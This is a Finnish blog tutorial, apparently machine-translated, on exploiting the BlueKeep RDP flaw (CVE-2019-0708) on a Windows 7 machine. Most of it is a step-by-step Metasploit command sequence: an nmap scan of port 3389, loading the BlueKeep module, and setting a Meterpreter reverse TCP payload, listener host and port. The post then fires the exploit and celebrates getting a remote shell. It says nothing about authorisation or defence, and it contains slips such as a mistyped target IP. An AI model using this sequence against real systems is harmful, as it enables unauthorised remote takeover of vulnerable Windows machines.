BlueKeep – Exploit Windows (RDP-haavoittuvuus) etänä

Remote desktop protocol (RDP) on suojattu verkkoviestintäprotokolla, joka on suunniteltu etähallintaan sekä virtuaalisten työpöytien, sovellusten ja RDP-päätepalvelimen etäkäyttöön.

RDP:n avulla verkon ylläpitäjät pystyvät etädiagnosoimaan ja -ratkaisemaan yksittäisten tilaajien kohtaamia ongelmia. RDP on saatavilla useimpiin Windows-käyttöjärjestelmän versioihin. RDP Applen macOS:lle on myös vaihtoehto. Myös avoimen lähdekoodin versio on saatavilla.

Mutta RDP:ssä on haavoittuvuus Windows7:ssä, joten esittelemme sen tänään. Avataan siis komentorivi ja aloitetaan.

RDP toimii portissa 3389 TCP, joten ensin on tarkistettava, käyttääkö hyökkäämämme laite tätä protokollaa. Tätä varten käytämme nmapia ja määrittelemme portin 3389 skannauksessamme. Tarvitsemme vain Windows7-koneen IP-osoitteen. Meidän tässä tapauksessa on 192.168.100.84.

nmap -sV -p 3389 192.168.100.84

Yllä oleva komento skannaa ja etsii erityisesti, onko portti 3389 käytössä, voimme nähdä, että -p-lippu tarkoittaa porttia. Katsotaanpa siis skannauksen tulokset.

bk1.PNG

Kuten näemme, Windows7-laitteemme todellakin käyttää porttia 3389. Siirrymme nyt hyväksikäyttöön. Ensin meidän on avattava Metasploit.

msfconsole

Seuraavaksi etsimme etsimämme exploitin, meidän tapauksessamme Bluekeep.

search bluekeep

bk2.PNG

Tässä näemme siis kaksi exploitia, molemmat Bluekeepiä varten, mutta tarvitsemme vain alimman. Käytetään siis sitä.

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

bk3

Kun näemme exploitin punaisella, tiedämme, että käytämme sitä nyt. Etsitään siis lisätietoja tästä exploitista.

info

bk4

Se antaa meille siis selityksen siitä, miten tämä exploit pystyy käsittelemään sidoksia väärin saadakseen koodin suorituksen. Täydellistä. Seuraavaksi meidän on kerrottava Metasploitille kohde-Windows7-koneen IP-osoite.

set RHOSTS 109.168.100.84

bk5.PNG

Kun tuo s on määritetty, voimme mennä eteenpäin ja antaa sille hyötykuorman, jota haluamme käyttää yhdessä hyväksikäytön kanssa käänteisen TCP-kuoren saamiseksi.

set payload windows/x64/meterpreter/reverse_tcp

Määrittelemme siis Windows-käyttöjärjestelmän, 64-bittisen arkkitehtuurin ja pyydämme käänteistä TCP-kuorta Meterpreter-istunnon kanssa. Pari muuta asiaa, jotka meidän on tehtävä, on antaa Metasploitille hyökkäävän koneemme IP-osoite ja porttinumero kuunneltavaksi.

set LHOST 192.168.100.237set LPORT 4444

bk7

Määritämme portin 4444 kuunneltavaksi yksinkertaisesti siksi, että tiedämme, ettei kyseisessä portissa ole käynnissä mitään muuta palvelua. Nyt haluamme siis nähdä, minkä kohdevaihtoehdon Metasploit antaa meille.

show targets

bk8

Tiedämme jo aiemmasta nmap-skannauksestamme, että Windows7-laatikko toimii VMWaressa, tarkemmin sanottuna Virtualboxissa, joten valitsemme luettelosta numeron 2.

set target 2

bk9

Jos kaikki on valmista, viimeinen vaihe on kohdekoneen hyväksikäyttö.

exploit

bk10.PNG

Voidaan nähdä, että hyväksikäyttö yrittää toimia. Näemme myös, että se kertoo, että kohde on haavoittuva. Tämän exploitin pitäisi kestää vain minuutti, ennen kuin koodi suoritetaan.

bk11

BOOM!!! meillä on Meterpreter-kuori kohdekoneelta!!! Näin Bluekeep toimii.

Kiitos lukemisesta kaverit, pyydämme teitä palaamaan takaisin saadaksenne lisää tämän kaltaisia postauksia ja antakaa meille ehdotuksia siitä, mistä haluaisitte meidän kirjoittavan.

Älkää myöskään unohtako tilata, jakaa ja tykätä, kiitos jo etukäteen!!!

Vastaa

Sähköpostiosoitettasi ei julkaista.